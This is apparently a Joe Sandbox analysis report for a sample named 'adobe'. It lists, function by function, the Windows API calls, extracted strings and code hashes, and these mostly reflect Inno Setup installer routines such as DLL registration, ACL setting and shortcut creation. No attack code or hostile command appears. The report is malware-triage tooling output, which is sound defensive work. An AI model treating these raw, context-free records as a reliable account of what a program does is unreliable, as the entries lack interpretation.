• Opcode ID: b965a0132ad26a56d58156bb8aa5a4c51339e286f8ae4d564bc11b0873dfe01e
• Instruction ID: b8ba5a3252dd9dd8755954997f8cc70cf1688dd1015ecfd52c1097a8d2c67521
• Opcode Fuzzy Hash: b965a0132ad26a56d58156bb8aa5a4c51339e286f8ae4d564bc11b0873dfe01e
• Instruction Fuzzy Hash: 995106316082058FC710DB6AD681A9BF3E5FF98304B2482BBD854C7392D7B8EDA1C759
Uniqueness
Uniqueness Score: -1.00%

APIs
• NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0047782A
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: NtdllProc_Window
• String ID:
• API String ID: 4255912815-0
• Opcode ID: 02ae22fd70e0c6a07adb20481ecb91dbe924fee2b1f277cc8f63ad28d9980f35
• Instruction ID: 2dd525ea0bd0e215e4ec5d52a323d7dc26d8735cacf0c835bff5f74eef0b1e04
• Opcode Fuzzy Hash: 02ae22fd70e0c6a07adb20481ecb91dbe924fee2b1f277cc8f63ad28d9980f35
• Instruction Fuzzy Hash: C0412639608104DFCB14CFA9C2848AABBF5FB48310BB5C996E848DB305D338EE41DB95
Uniqueness
Uniqueness Score: -1.00%

APIs
• ArcFourCrypt._ISCRYPT(?,?,?,0046D01C,?,?,0046D01C,00000000), ref: 0045CA67
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CryptFour
• String ID:
• API String ID: 2153018856-0
• Opcode ID: 652ca7e95d520f478db864d31e1c50fd1cbe8d8ffee6081fd2562b398a9281da
• Instruction ID: 196b54fe7aa8ab1053afe2cffafcf6ed6da51dc24599f2bb869cb02721a3a021
• Opcode Fuzzy Hash: 652ca7e95d520f478db864d31e1c50fd1cbe8d8ffee6081fd2562b398a9281da
• Instruction Fuzzy Hash: 7EC09BF240420CBF65005795FCC9C77F75CE65C6647408126F60442101D671AC1045B4
Uniqueness
Uniqueness Score: -1.00%

APIs
• ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046CC8C,?,0046CE6D), ref: 0045CA7A
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CryptFour
• String ID:
• API String ID: 2153018856-0
• Opcode ID: 94da5b28650a6231c2ea90e9e727fe7b396b15a16109e44d83a51c1f6f4de3e0
• Instruction ID: f930510039fdc8c4d2d2d599ed284be9893e60875d5d975e013ee6f81a6adef0
• Opcode Fuzzy Hash: 94da5b28650a6231c2ea90e9e727fe7b396b15a16109e44d83a51c1f6f4de3e0
• Instruction Fuzzy Hash: E8A002B0E80300BAFD3057706E0EF37252CD7D4F01F208465B211A91D4C6A46404857C
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000001.00000002.2905260352.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000001.00000002.2905228420.0000000010000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.2905290111.0000000010002000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10000000_adobe.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
• Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
• Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
• Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000001.00000002.2905260352.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000001.00000002.2905228420.0000000010000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.2905290111.0000000010002000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10000000_adobe.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
• Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
• Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
• Instruction Fuzzy Hash:
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateMutexA.KERNEL32(00498AF8,00000001,00000000,00000000,00457975,?,?,?,00000001,?,00457B8F,00000000,00457BA5,?,00000000,0049A628), ref: 0045768D
• CreateFileMappingA.KERNEL32(000000FF,00498AF8,00000004,00000000,00002018,00000000), ref: 004576C5
• MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000,0045794B,?,00498AF8,00000001,00000000,00000000,00457975,?,?,?), ref: 004576EC
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004577F9
• ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,00000000,0045794B,?,00498AF8,00000001,00000000,00000000,00457975), ref: 00457751
  • Part of subcall function 00452B0C: GetLastError.KERNEL32(00000000,0045357D,00000005,00000000,004535B2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496A6D,00000000), ref: 00452B0F
• CloseHandle.KERNEL32(00457B8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457810
• WaitForSingleObject.KERNEL32(00000000,000000FF,00457B8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457849
• GetLastError.KERNEL32(00000000,000000FF,00457B8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045785B
• UnmapViewOfFile.KERNEL32(00000000,00457952,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045792D
• CloseHandle.KERNEL32(00000000,00457952,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045793C
• CloseHandle.KERNEL32(00000000,00457952,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457945
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CloseCreateFileHandle$ErrorLastMutexView$MappingObjectProcessReleaseSingleUnmapWait
• String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetProcAddress$LoadLibrary$MapViewOfFile$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d$ReleaseMutex$Spawning _RegDLL.tmp$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp
• API String ID: 4012871263-351310198
• Opcode ID: c1ffd9fe300eab0a4412b94547705dcdf208e35da1cfc2d7785f4b32c2b71e43
• Instruction ID: 83924714922b720040bdc1829d4bd497e207e2bebaa4b90c240c2e7d337cbd3a
• Opcode Fuzzy Hash: c1ffd9fe300eab0a4412b94547705dcdf208e35da1cfc2d7785f4b32c2b71e43
• Instruction Fuzzy Hash: FA915270E042159BDB10EFA9D845B9EB7B4EB44305F10857BE814EB383DB789948CB69
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
• SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
• LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
• SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
• GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
• GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
• GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
• GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
• GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
• GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
• GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
• GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
• GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
• GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
• FreeLibrary.KERNEL32(00000001,?,00419000,00000000,?,?,?,00000001), ref: 0041F27F
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                                                                                          • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                                                                                          • API String ID: 2323315520-3614243559
                                                                                                                                                          • Opcode ID: 38fef4e5117ff1ef5e4aad51512f696ef6634172072b968ee68f79627089ce7d
                                                                                                                                                          • Instruction ID: cf5be9d6f1a649145535b6a7131e14805afeac8bde6fe10f2a473d18be96f611
                                                                                                                                                          • Opcode Fuzzy Hash: 38fef4e5117ff1ef5e4aad51512f696ef6634172072b968ee68f79627089ce7d
                                                                                                                                                          • Instruction Fuzzy Hash: D63110B1640700EBDF00EBF9AC86A653294F729724745093FB648DB192DB7E485ECB1D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• 73A1A570.USER32(00000000,?,0041A954,?), ref: 0041CA50
• 73A24C40.GDI32(?,00000000,?,0041A954,?), ref: 0041CA5C
• 73A26180.GDI32(0041A954,?,00000001,00000001,00000000,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA80
• 73A24C00.GDI32(?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA90
• SelectObject.GDI32(0041CE4C,00000000), ref: 0041CAAB
• FillRect.USER32(0041CE4C,?,?), ref: 0041CAE6
• SetTextColor.GDI32(0041CE4C,00000000), ref: 0041CAFB
• SetBkColor.GDI32(0041CE4C,00000000), ref: 0041CB12
• PatBlt.GDI32(0041CE4C,00000000,00000000,0041A954,?,00FF0062), ref: 0041CB28
• 73A24C40.GDI32(?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954), ref: 0041CB3B
• SelectObject.GDI32(00000000,00000000), ref: 0041CB6C
• 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954), ref: 0041CB84
• 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?), ref: 0041CB8D
• 73A18830.GDI32(0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CB9C
• 73A122A0.GDI32(0041CE4C,0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CBA5
• SetTextColor.GDI32(00000000,00000000), ref: 0041CBBE
• SetBkColor.GDI32(00000000,00000000), ref: 0041CBD5
• 73A24D40.GDI32(0041CE4C,00000000,00000000,0041A954,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC1A,?,?,00000000), ref: 0041CBF1
• SelectObject.GDI32(00000000,?), ref: 0041CBFE
• DeleteDC.GDI32(00000000), ref: 0041CC14
  • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Color$ObjectSelect$A122A18830Text$A26180A570DeleteFillRect
• String ID:
• API String ID: 1381628555-0
• Opcode ID: 0f47872a13c127901087358d9df865229a2f9d400c2edbf0839bf343a180c7d1
• Instruction ID: 69ed6b4e4825e3c47d53d1ee88e95f0281db4649dcd7e45998b3becab3701dfd
• Opcode Fuzzy Hash: 0f47872a13c127901087358d9df865229a2f9d400c2edbf0839bf343a180c7d1
• Instruction Fuzzy Hash: 6261EC71A44609AFDF10EBE9DC86F9FB7B8EF48704F14446AB504E7281D67CA9408B68
Uniqueness
• Uniqueness Score: -1.00%

APIs
• ShowWindow.USER32(?,00000005,00000000,00496E30,?,?,00000000,?,00000000,00000000,?,004971E7,00000000,004971F1,?,00000000), ref: 00496B1B
• CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496E30,?,?,00000000,?,00000000,00000000,?,004971E7,00000000), ref: 00496B2E
• ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496E30,?,?,00000000,?,00000000,00000000), ref: 00496B3E
• MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00496B5F
• ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496E30,?,?,00000000,?,00000000), ref: 00496B6F
  • Part of subcall function 0042D418: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4A6,?,?,?,00000001,?,004555AA,00000000,00455612), ref: 0042D44D
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
• String ID: (rI$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$qI
• API String ID: 2000705611-2592930226
• Opcode ID: 392a5d1fef952839e95e9b978f1a743527d762900184a641eacf38a5eef72624
• Instruction ID: 4c11abcdbfb461b7d647ba7693d2f2a167619218498683e16ce031b9e504508c
• Opcode Fuzzy Hash: 392a5d1fef952839e95e9b978f1a743527d762900184a641eacf38a5eef72624
• Instruction Fuzzy Hash: 2F91C534B042449FDF11EBA5C852BAF7BA5EB49308F524477F800AB682D63CAC01CB69
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(00000000,0045A1B4,?,?,?,?,?,00000006,?,00000000,00495ECB,?,00000000,00495F6E), ref: 0045A066
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: ErrorLast
• String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
• API String ID: 1452528299-3112430753
• Opcode ID: 6067df2a702a45cb020847823167e249e23145af7fd1c160593c73af87b23520
• Instruction ID: 585700f695afdb727b25681db045cd46e0715bcc6ef46f3516a2bde87356df66
• Opcode Fuzzy Hash: 6067df2a702a45cb020847823167e249e23145af7fd1c160593c73af87b23520
• Instruction Fuzzy Hash: 6871B030B046045BCB01EF6988827AE7BA4AF49715F50856BFC01DB383DB7C9E5D875A
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetVersion.KERNEL32 ref: 0045C3FA
• GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045C41A
• GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045C427
• GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045C434
• GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045C442
  • Part of subcall function 0045C2E8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045C387,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045C361
• AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045C635,?,?,00000000), ref: 0045C4FB
• GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045C635,?,?,00000000), ref: 0045C504
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
• String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
• API String ID: 59345061-4263478283
• Opcode ID: 1ed38a4e901c2ea8dd20ace539c31e4d5a72e922b331e0779383c5f16a4cf9fe
• Instruction ID: 2324ee668b9984b5a17f8dfa8b7107ea71667c1f280dda851e0a9f9f44b51649
• Opcode Fuzzy Hash: 1ed38a4e901c2ea8dd20ace539c31e4d5a72e922b331e0779383c5f16a4cf9fe
• Instruction Fuzzy Hash: F85174B1900308EFDB10DFD9C881BAEB7B8EB4D715F14806AF905B7241D6789A45CFA9
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • 73A24C40.GDI32(00000000,?,00000000,?), ref: 0041B3D3
                                                                                                                                                          • 73A24C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3DD
                                                                                                                                                          • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3EF
                                                                                                                                                          • 73A26180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B406
                                                                                                                                                          • 73A1A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B412
                                                                                                                                                          • 73A24C00.GDI32(00000000,0000000B,?,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B43F
                                                                                                                                                          • 73A1A480.USER32(00000000,00000000,0041B472,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B465
                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                                                                                                          • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                                                                                                          • DeleteDC.GDI32(?), ref: 0041B4E9
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Object$Select$Delete$A26180A480A570Stretch
• String ID:
• API String ID: 359944910-0
• Opcode ID: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
• Instruction ID: 9e854467c286a28b18f31183f63f6c048648830cb6dea2264be82148a8da808a
• Opcode Fuzzy Hash: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
• Instruction Fuzzy Hash: DC419D71E40619AFDF10EAE9D846FAFB7B8EF08704F104466B614FB281D67969408BA4
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
• WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00471E04
• SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00471F07
• SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00471F1D
• SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00471F42
Similarity
• API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
• String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
• API String ID: 971782779-3668018701
• Opcode ID: 6ac56c40dede855880e8ad846f9cf078f66ca49bc3867743a9702007109289be
• Instruction ID: 2c76df8ba625d9f67a49e4dde8e83c51fb287a1c504e4bc7131b70b5a5e3fea9
• Opcode Fuzzy Hash: 6ac56c40dede855880e8ad846f9cf078f66ca49bc3867743a9702007109289be
• Instruction Fuzzy Hash: B3D13374A001499FDB11EFA9D981BDEB7F5AF08304F50806AF904B7392C778AE45CB69
Uniqueness
Uniqueness Score: -1.00%

APIs
• 756FE550.OLE32(00498A68,00000000,00000001,00498774,?,00000000,00455D93), ref: 00455AD2
• 756FE550.OLE32(00498764,00000000,00000001,00498774,?,00000000,00455D93), ref: 00455AF8
• SysFreeString.OLEAUT32(?), ref: 00455C4B
• SysFreeString.OLEAUT32(00000000), ref: 00455D49
  • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
  • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
Strings
• IPropertyStore::Commit, xrefs: 00455C9B
• IPersistFile::Save, xrefs: 00455D1A
• IShellLink::QueryInterface(IID_IPersistFile), xrefs: 00455CBC
• IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00455C82
• IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00455C30
• IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 00455BE1
• CoCreateInstance, xrefs: 00455B03
Similarity
• API ID: String$E550Free$AllocByteCharMultiWide
• String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)
• API String ID: 2445757755-2511345603
• Opcode ID: c40b4a6482fd02c2705c86a684847c75d80b38a48eee8cad0107ee061894c800
• Instruction ID: 56f298b1da12e5b408e16fbb21681473d63e285224e10069650d818475d95191
• Opcode Fuzzy Hash: c40b4a6482fd02c2705c86a684847c75d80b38a48eee8cad0107ee061894c800
• Instruction Fuzzy Hash: 0CA16171A00604AFDB41DFA9C895BAE77F8EF09305F144066F904E7262DB78DD48CB69
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60
• RegQueryValueExA.ADVAPI32(0045A38A,00000000,00000000,?,00000000,?,00000000,00454039,?,0045A38A,00000003,00000000,00000000,00454070), ref: 00453EB9
  • Part of subcall function 0042E73C: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528E3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
• RegQueryValueExA.ADVAPI32(0045A38A,00000000,00000000,00000000,?,00000004,00000000,00453F83,?,0045A38A,00000000,00000000,?,00000000,?,00000000), ref: 00453F3D
